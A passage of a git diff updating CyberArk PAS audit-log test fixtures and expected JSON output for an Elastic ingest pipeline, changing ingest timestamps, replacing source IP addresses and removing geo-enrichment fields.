{\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 02:19:42\",\"IsoTimestamp\":\"2021-03-08T10:19:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"459\",\"Desc\":\"General Audit\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"General Audit\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Dual account rotation\",\"ExtraDetails\":\"DualAccountStatus=Active;Index=2;\",\"Message\":\"General Audit\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"24\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614868762\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "459", "kind": "event" @@ -158,7 +158,7 @@ "event": { "severity": 2, "action": "general audit", - "ingested": "2021-06-09T10:24:35.480443300Z", + "ingested": "2021-12-09T13:37:05.315115400Z", "original": "\u003c5\u003e1 2021-03-10T14:38:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 06:38:57\",\"IsoTimestamp\":\"2021-03-10T14:38:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"459\",\"Desc\":\"General Audit\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"General Audit\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Dual account rotation\",\"ExtraDetails\":\"DualAccountStatus=Active;Index=1;\",\"Message\":\"General Audit\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "459", "kind": "event" @@ -241,7 +241,7 @@ "event": { "severity": 2, "action": "general audit", - "ingested": "2021-06-09T10:24:35.480446Z", + "ingested": "2021-12-09T13:37:05.315123500Z", "original": "\u003c5\u003e1 2021-03-14T11:48:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 04:48:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T11:48:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e459\u003c/MessageID\u003e\\n \u003cDesc\u003eGeneral Audit\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eGeneral Audit\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eDual account rotation\u003c/Reason\u003e\\n \u003cExtraDetails\u003eDualAccountStatus=Active;Index=2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eGeneral Audit\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDesktopLocal\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"x_accountB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"components\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"GroupName\\\" Value=\\\"WindowsGroup\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615419568\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Index\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DualAccountStatus\\\" Value=\\\"Active\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"VirtualUsername\\\" Value=\\\"virtual\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 04:48:26\",\"IsoTimestamp\":\"2021-03-14T11:48:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"459\",\"Desc\":\"General Audit\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"General Audit\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Dual account rotation\",\"ExtraDetails\":\"DualAccountStatus=Active;Index=2;\",\"Message\":\"General Audit\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"25\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615419568\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "459", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json index 330b08c1cda..3f96e28a992 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-467-the-component-public-key-for-jwt-authentication-was-updated.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "the component public key for jwt authentication was updated", - "ingested": "2021-06-09T10:24:35.576057Z", + "ingested": "2021-12-09T13:37:05.706900Z", "original": "\u003c5\u003e1 2021-03-10T18:14:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:14:35\",\"IsoTimestamp\":\"2021-03-10T18:14:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"467\",\"Desc\":\"The component public key for JWT authentication was updated\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"The component public key for JWT authentication was updated\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"The component public key for JWT authentication was updated\",\"GatewayStation\":\"\"}}}", "code": "467", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json index bb9f579d866..f86608120b8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-479-security-warning-the-signature-hash-algorithm-of-the-vault-certificate-is-sha1.log-expected.json @@ -46,7 +46,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:35.596452500Z", + "ingested": "2021-12-09T13:37:05.810861Z", "original": "\u003c7\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"479\",\"Desc\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"Severity\":\"Error\",\"Issuer\":\"Builtin\",\"Action\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"GatewayStation\":\"\"}}}", "code": "479", "kind": "event", @@ -90,7 +90,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:35.596463100Z", + "ingested": "2021-12-09T13:37:05.810869800Z", "original": "Mar 08 07:46:54 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"479\",\"Desc\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"Severity\":\"Error\",\"Issuer\":\"Builtin\",\"Action\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Security warning - The Signature Hash Algorithm of the Vault certificate is SHA1.\",\"GatewayStation\":\"\"}}}", "code": "479", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json index 2841a044b9f..53c760d0864 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-482-update-existing-add-account-bulk-operation-succeeded.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "update existing add account bulk operation succeeded", - "ingested": "2021-06-09T10:24:35.631517300Z", + "ingested": "2021-12-09T13:37:05.981143100Z", "original": "\u003c5\u003e1 2021-03-10T08:31:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:31:49\",\"IsoTimestamp\":\"2021-03-10T08:31:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"482\",\"Desc\":\"Update existing Add Account Bulk Operation succeeded\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Update existing Add Account Bulk Operation succeeded\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update existing Add Account Bulk Operation succeeded\",\"GatewayStation\":\"\"}}}", "code": "482", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log index f3d9bd31a39..6b4bda22fbe 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log @@ -1,6 +1,6 @@ <5>1 2021-03-08T18:24:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:50","IsoTimestamp":"2021-03-08T18:24:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PVWAAppUser","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAPrivateUserPrefs","File":"Root\\YWRtaW5pc3RyYXRvcg==","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"Root\\syntaxparser-conf.json.1.1","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"Root\\syntaxparser-conf.json.1.1","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} <5>1 2021-03-10T18:36:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:36:22","IsoTimestamp":"2021-03-10T18:36:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} -<5>1 2021-03-10T22:17:56Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:56","IsoTimestamp":"2021-03-10T22:17:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} -<5>1 2021-03-11T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:27\n 2021-03-11T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n PSMPApp_VAGRANT\n Store File\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\n 81.32.170.205\n \n \n \n \n \n Store File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:27","IsoTimestamp":"2021-03-11T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} +<5>1 2021-03-10T22:17:56Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:56","IsoTimestamp":"2021-03-10T22:17:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} +<5>1 2021-03-11T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:27\n 2021-03-11T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n PSMPApp_VAGRANT\n Store File\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\n 67.43.156.13\n \n \n \n \n \n Store File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:27","IsoTimestamp":"2021-03-11T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} <5>1 2021-03-11T19:45:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:45:26\n 2021-03-11T19:45:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n Administrator\n Store File\n \n \n PVWAConfig\n Root\\PVConfiguration.xml\n 127.0.0.1\n \n \n \n \n \n Store File\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:45:26","IsoTimestamp":"2021-03-11T19:45:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json index c2131001e3d..3b417a619cf 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-50-store-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-06-09T10:24:35.653794300Z", + "ingested": "2021-12-09T13:37:06.052356900Z", "original": "\u003c5\u003e1 2021-03-08T18:24:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:50\",\"IsoTimestamp\":\"2021-03-08T18:24:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAPrivateUserPrefs\",\"File\":\"Root\\\\YWRtaW5pc3RyYXRvcg==\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" @@ -65,20 +65,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -98,7 +86,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -108,7 +96,7 @@ "iso_timestamp": "2021-03-10T09:11:21Z", "file": "Root\\syntaxparser-conf.json.1.1", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Store File", "message": "Store File", "issuer": "Administrator", @@ -122,8 +110,8 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-06-09T10:24:35.653805600Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"Root\\\\syntaxparser-conf.json.1.1\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:06.052364800Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"Root\\\\syntaxparser-conf.json.1.1\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" } @@ -180,7 +168,7 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-06-09T10:24:35.653820300Z", + "ingested": "2021-12-09T13:37:06.052371300Z", "original": "\u003c5\u003e1 2021-03-10T18:36:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:36:22\",\"IsoTimestamp\":\"2021-03-10T18:36:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"50\",\"Desc\":\"Store File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store File\",\"GatewayStation\":\"\"}}}", "code": "50", "kind": "event" @@ -193,19 +181,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -225,7 +202,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -235,7 +212,7 @@ "iso_timestamp": "2021-03-10T22:17:56Z", "file": "ROOT\\PVConfiguration.xml", "safe": "PVWAConfig", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Store File", "message": "Store File", "issuer": "Administrator", @@ -249,8 +226,8 @@ "event": { "severity": 2, "action": "store file", - "ingested": "2021-06-09T10:24:35.653824400Z", - "original": "\u003c5\u003e1 2021-03-10T22:17:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 